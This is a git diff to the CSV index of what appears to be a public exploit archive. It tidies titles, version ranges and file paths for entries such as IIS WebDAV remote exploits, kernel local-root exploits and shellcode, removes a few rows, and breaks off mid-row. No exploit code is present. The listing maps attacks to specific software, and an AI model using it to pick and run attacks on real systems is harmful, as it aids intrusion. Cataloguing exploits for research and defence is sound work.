diff --git a/files.csv b/files.csv index 7c27852a5..4505f8e6b 100755 --- a/files.csv +++ b/files.csv @@ -1,6 +1,6 @@ id,file,description,date,author,platform,type,port -1,platforms/windows/remote/1.c,"Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80 -2,platforms/windows/remote/2.c,"Microsoft Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80 +1,platforms/windows/remote/1.c,"Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 +2,platforms/windows/remote/2.c,"Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0 5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -34,7 +34,7 @@ id,file,description,date,author,platform,type,port 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,N/A,linux,remote,80 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 -36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 +36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69 @@ -49,7 +49,7 @@ id,file,description,date,author,platform,type,port 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 -51,platforms/windows/remote/51.c,"Microsoft Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 +51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21 @@ -645,7 +645,7 @@ id,file,description,date,author,platform,type,port 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 -823,platforms/windows/remote/823.c,"Dream FTP 1.2 - Remote Format String Exploit",2004-02-11,Skylined,windows,remote,21 +823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com Ftp Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203 @@ -4175,7 +4175,7 @@ id,file,description,date,author,platform,type,port 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,"Khashayar Fereidani",php,webapps,0 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability",2007-10-13,"Mehmet Ince",php,webapps,0 4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0 -4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 +4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 4531,platforms/windows/local/4531.py,"jetAudio 7.x (m3u File) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0 4532,platforms/linux/dos/4532.pl,"eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0 4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501 @@ -4197,7 +4197,7 @@ id,file,description,date,author,platform,type,port 4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 - Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 4550,platforms/php/webapps/4550.pl,"BBPortalS <= 2.0 - Remote Blind SQL Injection Exploit",2007-10-21,Max007,php,webapps,0 4551,platforms/php/webapps/4551.txt,"PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 -4552,platforms/linux/remote/4552.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support)",2007-10-21,h3rcul3s,linux,remote,0 +4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)",2007-10-21,h3rcul3s,linux,remote,0 4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions safe_mode and disable_function bypass",2007-10-22,shinnai,windows,local,0 4554,platforms/php/webapps/4554.txt,"SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability",2007-10-22,BiNgZa,php,webapps,0 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 scripture.php Remote File Inclusion Vulnerability",2007-10-22,GoLd_M,php,webapps,0 @@ -8253,7 +8253,7 @@ id,file,description,date,author,platform,type,port 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0 8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0 -8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 +8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability",2009-05-21,Striker7,php,webapps,0 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 @@ -8263,7 +8263,7 @@ id,file,description,date,author,platform,type,port 8762,platforms/php/webapps/8762.txt,"Article Directory (page.php) Remote Blind SQL Injection Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0 8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0 8764,platforms/php/webapps/8764.txt,"ZaoCMS (download.php) Remote File Disclosure Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0 -8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0 +8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0 8766,platforms/php/webapps/8766.txt,"Tutorial Share <= 3.5.0 Insecure Cookie Handling Vulnerability",2009-05-22,Evil-Cod3r,php,webapps,0 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0 8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection Vulnerability",2009-05-22,Qabandi,php,webapps,0 @@ -13650,7 +13650,7 @@ id,file,description,date,author,platform,type,port 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0 -15803,platforms/windows/dos/15803.py,"Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0 +15803,platforms/windows/dos/15803.py,"Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0 15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - (.m3u) Buffer Overflow",2010-12-11,zota,windows,local,0 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -14267,7 +14267,7 @@ id,file,description,date,author,platform,type,port 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 Printer Host Header Overflow",2010-04-30,metasploit,windows,remote,0 -16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0 +16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0 16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,metasploit,windows,remote,0 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,metasploit,windows,remote,0 16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,metasploit,windows,remote,0 @@ -16239,7 +16239,7 @@ id,file,description,date,author,platform,type,port 18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution Vulnerability",2012-04-20,metasploit,linux,remote,0 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0 -18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x Webdav File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0 +18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0 18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18765,platforms/windows/dos/18765.txt,"samsung net-i ware <= 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 @@ -16436,7 +16436,7 @@ id,file,description,date,author,platform,type,port 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 DEBUG Vulnerability",1988-08-01,anonymous,linux,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0 -19033,platforms/windows/remote/19033.txt,"Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 +19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 @@ -19612,10 +19612,10 @@ id,file,description,date,author,platform,type,port 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (2)",2003-04-10,"Wojciech Purczynski",linux,local,0 22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass Vulnerability",2003-03-17,"dong-h0un U",cgi,webapps,0 -22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0 -22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0 -22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0 -22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 +22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0 +22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0 +22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0 +22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0 22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0 @@ -20874,7 +20874,6 @@ id,file,description,date,author,platform,type,port 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout Vulnerability",2004-02-06,"Markus Mueller",linux,local,0 23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing Vulnerability",2004-02-06,"Tri Huynh",cgi,webapps,0 23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (1)",2004-02-07,shaun2k2,windows,dos,0 -23661,platforms/windows/remote/23661.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)",2004-02-07,Skylined,windows,remote,0 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine Remote Denial of Service Vulnerability",2004-02-09,scrap,linux,dos,0 23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 - 'News' Module Cross-Site Scripting Vulnerability",2004-02-09,"Janek Vind",php,webapps,0 23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 Results.STM Post Request Buffer Overflow Vulnerability",2004-02-09,nd@felinemenace.org,windows,dos,0 @@ -20968,7 +20967,6 @@ id,file,description,date,author,platform,type,port 23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (3)",2004-02-26,shaun2k2,windows,dos,0 23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (4)",2004-02-26,lion,windows,remote,0 23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 Error Page Cross-Site Scripting Vulnerability",2004-02-26,Soby,hardware,remote,0 -23765,platforms/solaris/local/23765.c,"Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability",2004-02-27,"Marco Ivaldi",solaris,local,0 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability",2003-09-11,Jelmer,windows,remote,0 @@ -25279,7 +25277,6 @@ id,file,description,date,author,platform,type,port 28218,platforms/php/webapps/28218.txt,"Koobi Pro 5.6 showtopic Module toid Parameter XSS",2006-07-13,"Evampire chiristof",php,webapps,0 28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x ReplaceChild Denial of Service Vulnerability",2006-07-14,hdm,linux,dos,0 -28221,platforms/php/webapps/28221.pl,"Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)",2006-07-13,1dt.w0lf,php,webapps,0 28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Include Vulnerability",2006-07-14,"Chironex Fleckeri",php,webapps,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 @@ -25475,7 +25472,7 @@ id,file,description,date,author,platform,type,port 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.PHP Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.PHP Remote File Include Vulnerability",2006-08-22,Root3r_H3ll,php,webapps,0 -28424,platforms/linux/remote/28424.txt,"Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 +28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure Vulnerability",2006-03-27,anonymous,solaris,local,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution Vulnerability",2006-08-18,anonymous,novell,local,0 @@ -27760,7 +27757,7 @@ id,file,description,date,author,platform,type,port 30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service Vulnerability",2007-11-29,"Elazar Broad",windows,dos,0 30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.PHP3 - Cross-Site Scripting Vulnerability",2007-11-30,"Richard Brain",hardware,remote,0 30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0 -30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 +30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x_Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0 @@ -28214,7 +28211,7 @@ id,file,description,date,author,platform,type,port 31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection/Cross-Site Scripting",2008-03-03,"Digital Security Research Group",php,webapps,0 31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0 31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0 -31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0 +31329,platforms/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0 31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0 31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0 31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0 @@ -32189,7 +32186,7 @@ id,file,description,date,author,platform,type,port 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion/SQL Injection/XSS",2015-01-09,Technidev,php,webapps,80 35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0 -35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0 +35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0 35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0 @@ -35346,7 +35343,7 @@ id,file,description,date,author,platform,type,port 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0 -39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0 +39102,platforms/windows/local/39102.py,"EasyCafe Server <= 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0 39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0 39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 @@ -35394,8 +35391,8 @@ id,file,description,date,author,platform,type,port 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0 39149,platforms/lin_x86-64/shellcode/39149.c,"x64 Linux Bind TCP Port Shellcode",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0 -39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 -39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0 +39151,platforms/lin_x86-64/shellcode/39151.c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 +39152,platforms/linux/shellcode/39152.c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0 39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0 39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0 @@ -35999,7 +35996,14 @@ id,file,description,date,author,platform,type,port 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0 39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 -39809,platforms/windows/local/39809..cs,"Microsoft Windows 7-10 